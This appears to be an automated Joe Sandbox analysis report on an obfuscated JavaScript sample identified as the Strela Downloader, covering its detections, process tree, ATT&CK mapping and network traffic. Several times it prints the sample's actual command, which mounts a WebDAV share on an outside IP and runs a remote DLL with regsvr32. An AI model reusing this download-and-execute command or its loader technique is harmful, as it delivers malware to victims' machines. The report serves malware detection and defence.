Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2971435162666519472.js

Overview

General Information

Sample name:2971435162666519472.js
Analysis ID:1577454
MD5:d5cc72873b9b26833ee92e4c831c4eda
SHA1:15f9ae15690a8673bd299294064f5e7af5992750
SHA256:40fd4d27c0a600234b65d2379776c94c8ede1f3e18fe01eb57f06f7913dd1dd9
Tags:jsuser-lowmal3
Infos:

Detection

Strela Downloader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Gathers information about network shares
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 5256 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 1432 cmdline: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1412 cmdline: cmd /c net use \\193.143.1.231@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 1260 cmdline: net use \\193.143.1.231@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: wscript.exe PID: 5256JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_5256.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js", ProcessId: 5256, ProcessName: wscript.exe
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 193.143.1.231, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 1260, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49701
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5256, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dll, ProcessId: 1432, ProcessName: cmd.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js", ProcessId: 5256, ProcessName: wscript.exe
      Source: Process startedAuthor: frack113: Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1412, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 1260, ProcessName: net.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1412, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 1260, ProcessName: net.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Networking

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49701
      Source: global trafficTCP traffic: 192.168.2.7:49701 -> 193.143.1.231:8888
      Source: Joe Sandbox ViewASN Name: BITWEB-ASRU BITWEB-ASRU
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: net.exe, 0000000B.00000002.1296267570.000001AABC5E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.2318888/G
      Source: net.exe, 0000000B.00000002.1296267570.000001AABC5E8000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.1296267570.000001AABC60D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.1296267570.000001AABC63B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/
      Source: net.exe, 0000000B.00000002.1296267570.000001AABC5E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/W
      Source: net.exe, 0000000B.00000002.1296267570.000001AABC5E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/g

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: Yara matchFile source: amsi64_5256.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5256, type: MEMORYSTR

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: 2971435162666519472.jsInitial sample: Strings found which are bigger than 50
      Source: classification engineClassification label: mal72.rans.troj.spyw.evad.winJS@8/0@0/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1424:120:WilError_03
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dll
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Run("cmd /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s", "0", "false")

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49701
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\net.exe TID: 1648Thread sleep time: -30000s >= -30000sJump to behavior
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: net.exe, 0000000B.00000002.1296267570.000001AABC5E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
      Source: net.exe, 0000000B.00000002.1296267570.000001AABC648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dll
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information12
      Scripting
      Valid AccountsWindows Management Instrumentation12
      Scripting
      11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      Network Share Discovery
      Remote ServicesData from Local System11
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Process Injection
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      File and Directory Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      2971435162666519472.js3%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://193.143.1.231:8888/g0%Avira URL Cloudsafe
      http://193.143.1.2318888/G0%Avira URL Cloudsafe
      http://193.143.1.231:8888/0%Avira URL Cloudsafe
      http://193.143.1.231:8888/W0%Avira URL Cloudsafe
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://193.143.1.231:8888/Wnet.exe, 0000000B.00000002.1296267570.000001AABC5E8000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://193.143.1.231:8888/gnet.exe, 0000000B.00000002.1296267570.000001AABC5E8000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://193.143.1.231:8888/net.exe, 0000000B.00000002.1296267570.000001AABC5E8000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.1296267570.000001AABC60D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.1296267570.000001AABC63B000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://193.143.1.2318888/Gnet.exe, 0000000B.00000002.1296267570.000001AABC5E8000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      193.143.1.231
      unknownunknown
      57271BITWEB-ASRUtrue
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1577454
      Start date and time:2024-12-18 13:44:06 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 4m 12s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Run name:Without Instrumentation
      Number of analysed new started processes analysed:17
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:2971435162666519472.js
      Detection:MAL
      Classification:mal72.rans.troj.spyw.evad.winJS@8/0@0/1
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .js
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: 2971435162666519472.js
      TimeTypeDescription
      07:45:07API Interceptor1x Sleep call for process: net.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      193.143.1.231126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231:8888/140341625623863.dll
      126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231:8888/140341625623863.dll
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      BITWEB-ASRU126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231
      126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231
      new.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      qL619hzCfc.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      new.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      https://cgd-assinar.comGet hashmaliciousUnknownBrowse
      • 193.143.1.14
      11iEly4m6C.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      YnViC5yHLu.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      new.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      No context
      No context
      No created / dropped files found
      File type:ASCII text, with very long lines (13029), with no line terminators
      Entropy (8bit):4.830378830920875
      TrID:
        File name:2971435162666519472.js
        File size:13'029 bytes
        MD5:d5cc72873b9b26833ee92e4c831c4eda
        SHA1:15f9ae15690a8673bd299294064f5e7af5992750
        SHA256:40fd4d27c0a600234b65d2379776c94c8ede1f3e18fe01eb57f06f7913dd1dd9
        SHA512:78a8c1571960081becea275ce1687970bf5c988ccd79f06017286697b5a2e8d3b75b4c151723049bf1818706dbbe57b6ef56c03bfaf953d2565a9272f453adf5
        SSDEEP:384:EXx91qXAZZ2ZZcQHK6btZY1b4lQHK6bt1XIE5Xf:bE5Xf
        TLSH:4E42EE88AA26DB7E47E8C3AE556F380254F48F6C1D70C77AC57FE54700B1BE588E9260
        File Content Preview:function vjcuinvfp(){this[rbktsrbhk+fnucaons+qozwbvlw+vwgmjzlo](iwedatboe+ygzoksh+bdtedewrq+zbgfuja+hbmpxagw+gsmbtvq+lchfe+iwedatboe+smxtnv+kjisgyz+smxtnv+edsnt+odjkdymh+fnucaons+qjgmfvcu+lpjlp+qwdhxlhsg+qwdhxlhsg+nupmhi+edsnt+vwgmjzlo+zxfxct+sbszjfzf+win
        Icon Hash:68d69b8bb6aa9a86
        TimestampSource PortDest PortSource IPDest IP
        Dec 18, 2024 13:45:06.720297098 CET497018888192.168.2.7193.143.1.231
        Dec 18, 2024 13:45:06.840822935 CET888849701193.143.1.231192.168.2.7
        Dec 18, 2024 13:45:06.840930939 CET497018888192.168.2.7193.143.1.231
        Dec 18, 2024 13:45:06.841152906 CET497018888192.168.2.7193.143.1.231
        Dec 18, 2024 13:45:06.961591005 CET888849701193.143.1.231192.168.2.7
        Dec 18, 2024 13:45:08.271001101 CET888849701193.143.1.231192.168.2.7
        Dec 18, 2024 13:45:08.316894054 CET497018888192.168.2.7193.143.1.231
        Dec 18, 2024 13:45:08.332858086 CET497018888192.168.2.7193.143.1.231
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.749701193.143.1.23188881260C:\Windows\System32\net.exe
        TimestampBytes transferredDirectionData
        Dec 18, 2024 13:45:06.841152906 CET107OUTOPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: DavClnt
        translate: f
        Host: 193.143.1.231:8888
        Dec 18, 2024 13:45:08.271001101 CET237INHTTP/1.1 500 Internal Server Error
        Server: nginx/1.22.1
        Date: Wed, 18 Dec 2024 12:45:08 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 22
        Connection: keep-alive
        X-Content-Type-Options: nosniff
        Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
        Data Ascii: Internal server error


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:4
        Start time:07:45:04
        Start date:18/12/2024
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js"
        Imagebase:0x7ff74f520000
        File size:170'496 bytes
        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:8
        Start time:07:45:05
        Start date:18/12/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dll
        Imagebase:0x7ff61cff0000
        File size:289'792 bytes
        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:9
        Start time:07:45:05
        Start date:18/12/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff75da10000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:10
        Start time:07:45:05
        Start date:18/12/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:cmd /c net use \\193.143.1.231@8888\davwwwroot\
        Imagebase:0x7ff61cff0000
        File size:289'792 bytes
        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:11
        Start time:07:45:05
        Start date:18/12/2024
        Path:C:\Windows\System32\net.exe
        Wow64 process (32bit):false
        Commandline:net use \\193.143.1.231@8888\davwwwroot\
        Imagebase:0x7ff7b4ee0000
        File size:59'904 bytes
        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        No disassembly